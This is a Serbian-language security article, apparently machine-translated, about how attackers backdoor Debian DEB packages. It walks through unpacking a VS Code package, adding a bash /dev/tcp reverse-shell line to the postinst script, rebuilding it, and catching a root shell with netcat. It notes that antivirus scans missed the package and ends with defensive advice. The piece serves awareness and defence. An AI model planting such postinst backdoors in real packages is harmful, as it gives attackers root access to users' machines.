Да ли сте знали да нападачи могу да модификују скрипте упаковане у ДЕБ датотеку да би добили неовлашћени приступ вашем рачунару? Ево како се ДЕБ пакети користе позадинским вратима.

Кључне Такеаваис

  • ДЕБ пакети се могу лако користити у бацкдоору, омогућавајући нападачима да убаце злонамерни код у ваш систем када их инсталирате са роот дозволама.
  • Заражене ДЕБ пакете је тешко открити, јер их антивирусни софтвер или решења у облаку као што је ВирусТотал можда неће означити.
  • Да бисте се заштитили, избегавајте преузимање ДЕБ пакета са насумичних сајтова, држите се званичних сајтова за преузимање или сајтове од поверења заједнице и размислите о инсталирању безбедносних алата да бисте заштитили ваш Линук систем од мреже напада.

ДЕБ датотеке су софтверски пакети који су примарни формат за испоруку софтвера на Дебиан-базираним Линук дистрибуцијама.

Да бисте инсталирали ДЕБ пакете, морате да користите менаџер пакета као што је дпкг са роот дозволама. Нападачи користе ово и убризгавају бацкдоор у ове пакете. Када их инсталирате помоћу дпкг или било ког другог менаџера пакета, злонамерни код се такође извршава и компромитује ваш систем.

instagram viewer

Хајде да истражимо тачно како су ДЕБ пакети скривени и шта можете да урадите да бисте се заштитили.

Како се ДЕБ пакети користе у позадини?

Пре него што схватите како су ДЕБ пакети скривени у позадини, хајде да истражимо шта се налази унутар ДЕБ пакета. За демонстрацију, преузећу Мицрософт Висуал Студио Цоде ДЕБ пакет са званичне Мицрософт веб локације. Ово је исти пакет који бисте преузели ако желите да инсталирате ВС Цоде на Линук.

Преузимање:Висуал Студио Цоде

Сада када сте преузели циљни пакет, време је да га распакујете. Можете распаковати ДЕБ пакет користећи дпкг-деб команда са заставицу праћено путањом за чување садржаја:

dpkg-deb -R

Ово би требало да издвоји садржај пакета ВС Цоде.

Крећући се у фасциклу наћи ћете више директоријума, међутим, наш интерес лежи само у ДЕБИАН именик. Овај директоријум садржи скрипте за одржавање које се извршавају током инсталације са роот привилегијама. Као што сте можда већ схватили, нападачи модификују скрипте у овом директоријуму.

За демонстрацију, изменићу постинст скрипту и додајте једноставну Басх обрнуту ТЦП шкољку. Као што име каже, то је скрипта која се извршава након што се пакет инсталира на систем.

Садржи команде које финализују конфигурације као што су постављање симболичких веза, руковање зависношћу и још много тога. На интернету можете пронаћи тоне различитих обрнутих шкољки. Већина њих ће радити исто. Ево примера обрнуте шкољке у једној линији:

bash -i >& /dev/tcp/127.0.0.1/42069 0>&1

Објашњење команде:

  • басх: Ово је команда која позива Басх шкољку.
  • -ја: Ознака говори Басх-у да ради у интерактивном режиму омогућавајући командни И/О у реалном времену.
  • >& /дев/тцп/ип/порт: Ово преусмерава стандардни излаз и стандардна грешка на мрежну утичницу, у суштини успостављајући ТЦП везу са и .
  • 0>&1: Ово преусмерава улаз и излаз на исту локацију, односно на мрежну утичницу.

За оне који нису упућени, реверзна љуска је тип кода који, када се изврши на циљној машини, иницира везу назад са машином нападача. Обрнуте шкољке су одличан начин да се заобиђу ограничења заштитног зида пошто се саобраћај генерише са машине иза заштитног зида.

Ево како изгледа измењена скрипта:

Као што видите, све је исто, али је додата само једна линија, односно наша Басх реверзна шкољка. Сада морате да вратите датотеке у ".деб„формат. Једноставно користите дпкг команда са --буилд застави или употреби дпкг-деб са заставицу праћено путањом екстрахованог садржаја:

dpkg --build 
dpkg-deb -b

Сада је ДЕБ пакет са бацкдоором спреман за испоруку на злонамерне сајтове. Хајде да симулирамо сценарио где је жртва преузела ДЕБ пакет на свој систем и инсталира га као било који други обичан пакет.

Горње терминално окно је за ПОВ жртве, а доње је ПОВ нападача. Жртва инсталира пакет са судо дпкг -и а нападач стрпљиво ослушкује долазне везе користећи нетцат команду у Линуку.

Чим се инсталација заврши, приметите да нападач добија обрнуту везу љуске и сада има роот приступ систему жртве. Сада знате како су ДЕБ пакети скривени у позадини. Хајде сада да научимо како се можете заштитити.

Како открити да ли је ДЕБ пакет злонамеран

Сада када знате да су заражени ДЕБ пакети ствар, сигурно се питате како да пронађете заражене. За почетак, можете покушати да користите а Линук антивирусни софтвер као ЦламАВ. Нажалост, када је ЦламАВ скенирање покренуто на пакету, није га означило као злонамерно. Ево резултата скенирања:

Дакле, осим ако немате врхунско антивирусно решење (што није гаранција да нећете бити хаковани), прилично је тешко открити злонамерне ДЕБ пакете. Хајде да покушамо да користимо решење у облаку као што је веб локација ВирусТотал:

Као што видите, ВирусТотал није открио ништа лоше са њим. Па, једини начин да се заштитите од оваквих претњи је да пратите основну безбедносну хигијену као што је не преузимање датотека са непознатих извора, увек провера хеш датотеке, и уопште, избегавање инсталирања сумњивог софтвера.

Интернет је пун таквих претњи. Једини начин да сурфујете без губљења података је да имате памети о себи и прегледате поуздане сајтове. Поред тога, за Линук, такође бисте требали покушати да пронађете да ли софтвер који преузимате има АппИмаге варијанта јер су самостални и могу бити заштићени и на тај начин се држе ван контакта са вашим системом.

Немојте преузимати ДЕБ пакете са случајних локација!

ДЕБ пакети нису сами по себи лоши, међутим, нападачи могу лако да их наоружају и пошаљу корисницима који ништа не сумњају. Као што је показано, ДЕБ пакет се може лако отворити и модификовати за додавање прилагођеног кода са само неколико команди, што га чини уобичајеним вектором за испоруку малвера.

Чак и једноставна позадинска врата на ДЕБ пакетима остају неухваћена врхунским антивирусним решењима. Зато је најбоље да играте на сигурно, носите свој здрав разум док сурфујете вебом и увек преузимате софтвер само са званичних сајтова за преузимање или са сајтова од поверења заједнице.

Сада када сте свесни безбедносних ризика који долазе са инсталирањем ДЕБ пакета са нових или непознатих локација, требало би да будете опрезни када инсталирате нови софтвер. Међутим, само пазити на оно што инсталирате није довољно. Ваш Линук систем такође може бити мета мрежних напада.

Да бисте били сигурни да сте безбедни у случају мрежног напада, требало би да размислите о инсталирању алата за безбедност мреже.